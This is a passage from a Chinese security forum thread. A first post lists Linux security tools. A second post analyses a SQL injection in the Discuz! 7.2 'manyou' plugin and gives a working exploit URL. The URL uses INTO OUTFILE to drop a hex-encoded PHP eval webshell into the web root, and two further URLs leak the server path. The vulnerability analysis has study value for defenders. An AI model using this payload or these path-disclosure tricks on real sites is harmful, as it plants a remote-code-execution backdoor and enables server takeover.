返回列表 发帖

新手报到

提示: 作者被禁止或删除 内容自动屏蔽
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:Mycool发表,本帖发表者Mycool符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者Mycool和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

管理员必用10款Linux安全工具
作为一个Linux管理员,防御病毒,间谍程序, rootkit等非常重要.下面为你列举了10款Linux安全工具.Nmap Security Scanner阅读安装文档.体验 相关pdf文档 Nessus Vulnerability Scanner阅读扫描报告示例阅读阅读技术指南阅读基础知识 Clam AntiVirus安装帮助访问wikiPDF文档 Snort用户手册相关文档 ChkrootkitPDF文档 Tripwire详细指南Howto文档 Rootkit Hunter安装指南 Kismet介绍论坛 Shorewall安装文档快速入门功能介绍 Ethereal (现名为Wireshark)用户指南访问wiki


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Discuz! v7.2插件注入漏洞分析与利用(图)
在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。
漏洞文件./manyou/sources/notice.php
代码阅读:
if($option == 'del') {
$appid = intval($_GET['appid']);
$db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} elseif($option == 'deluserapp') {
$hash = trim($_GET['hash']);    //此处并没有进行过滤,直接导致注入的产生
if($action == 'invite') {   
$query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
if($value = $db->fetch_array($query)) {
$db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} else {
showmessage('manyou:noperm');
}
} else {
$db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice');
}
}
很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式,但如果当前数据库帐号有File_priv的话我们也可以直接into outfile。
/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23
[/quote]
[quote]0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E是的十六进制表示。
但想
into outfile的话,我们还得有web的物理路径,这在php的情况下并不难得到。
/manyou/admincp.php?my_suffix=%0A%0DTOBY57
/manyou/userapp.php?%0D%0A=TOBY57
这样就事具备,只差outfile了。




















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表